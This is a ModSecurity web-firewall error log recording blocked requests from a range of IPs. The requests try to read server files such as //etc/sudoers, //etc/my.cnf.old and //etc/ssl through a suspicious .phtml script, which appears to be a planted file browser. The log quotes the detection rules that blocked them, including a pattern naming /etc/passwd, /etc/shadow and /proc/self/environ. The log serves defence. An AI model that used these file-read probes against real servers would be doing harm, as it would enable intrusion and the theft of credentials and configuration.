[Fri Mar 20 05:32:11.153652 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.51:59104] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GCBCii7xarUs8iHZJvgAAAgo"]
[Fri Mar 20 05:32:11.157284 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.53:59114] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GCda6ubjKNq_cu4a0DQAAA0I"]
[Fri Mar 20 05:32:11.160663 2026] [:error] [pid 9818:tid 140411607643904] [client 57.141.18.108:59130] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GCl1pVZ5mVmJwsFMScgAAAFA"]
[Fri Mar 20 05:32:11.163319 2026] [:error] [pid 7893:tid 140411616036608] [client 57.141.18.70:59132] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GCxCii7xarUs8iHZJwAAAAg8"]
[Fri Mar 20 05:32:11.164966 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.82:59084] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GCPXLqtnMIWvjpaJ80AAAApU"]
[Fri Mar 20 05:32:11.180774 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.10:59124] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GCda6ubjKNq_cu4a0DgAAA0o"]
[Fri Mar 20 05:32:11.185409 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.55:59126] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GCjJ3M9BSuKP7CAb1vAAAAIQ"]
[Fri Mar 20 05:32:11.187489 2026] [:error] [pid 11642:tid 140411582465792] [client 57.141.18.72:59100] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GCLninkcc-iUj5ApBYwAAA5M"]
[Fri Mar 20 05:32:11.249069 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.120:59168] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GCzJ3M9BSuKP7CAb1vgAAAJg"]
[Fri Mar 20 05:32:12.128781 2026] [:error] [pid 7893:tid 140411666392832] [client 57.141.18.50:59206] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GDBCii7xarUs8iHZJwQAAAgk"]
[Fri Mar 20 05:32:12.276002 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.103:59208] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GDNa6ubjKNq_cu4a0DwAAA1E"]
[Fri Mar 20 05:32:12.496142 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.62:59228] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GDBCii7xarUs8iHZJwwAAAg4"]
[Fri Mar 20 05:32:12.930809 2026] [:error] [pid 10189:tid 140411565680384] [client 57.141.18.75:59128] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GDDJ3M9BSuKP7CAb1wQAAAJU"]
[Fri Mar 20 05:32:13.428065 2026] [:error] [pid 26799:tid 140411548894976] [client 57.141.18.24:59230] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GDda6ubjKNq_cu4a0EwAAA1c"]
[Fri Mar 20 05:32:13.745058 2026] [:error] [pid 7893:tid 140411691570944] [client 57.141.18.44:59312] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GDRCii7xarUs8iHZJxwAAAgY"]
[Fri Mar 20 05:32:15.306789 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.60:59346] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GDhCii7xarUs8iHZJyAAAAhM"]
[Fri Mar 20 05:32:15.308629 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.79:59354] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GDhCii7xarUs8iHZJzAAAAgM"]
[Fri Mar 20 05:32:15.325461 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.120:59386] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GD_HIg5MgXLBnicPcQwAAAc0"]
[Fri Mar 20 05:32:15.650563 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.113:59408] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GD-oXxyEfFpUF8f9kgQAAAUI"]
[Fri Mar 20 05:32:16.027052 2026] [:error] [pid 11642:tid 140411649607424] [client 57.141.18.122:59440] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GELninkcc-iUj5ApBcgAAA4s"]
[Fri Mar 20 05:32:16.335471 2026] [:error] [pid 11167:tid 140411649607424] [client 57.141.18.63:59446] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GEPHIg5MgXLBnicPcRAAAAcs"]
[Fri Mar 20 05:32:16.847816 2026] [:error] [pid 11167:tid 140411616036608] [client 57.141.18.76:59468] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GEPHIg5MgXLBnicPcRQAAAc8"]
[Fri Mar 20 05:32:17.127585 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.96:59478] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GEeoXxyEfFpUF8f9kgwAAAUw"]
[Fri Mar 20 05:32:17.351938 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.68:59498] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GEV1pVZ5mVmJwsFMSfAAAAEs"]
[Fri Mar 20 05:32:18.303717 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.122:59564] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GEvHIg5MgXLBnicPcTAAAAcE"]
[Fri Mar 20 05:32:18.499966 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.85:59578] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GEuoXxyEfFpUF8f9kiQAAAU8"]
[Fri Mar 20 05:32:18.814405 2026] [:error] [pid 31215:tid 140411683178240] [client 57.141.18.97:59610] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GEgF0L0L-SsrnPo5KnAAAAsc"]
[Fri Mar 20 05:32:19.470087 2026] [:error] [pid 9818:tid 140411599251200] [client 57.141.18.36:59656] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GE11pVZ5mVmJwsFMShAAAAFE"]
[Fri Mar 20 05:32:19.768166 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.124:59668] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GE9a6ubjKNq_cu4a0GwAAA0I"]
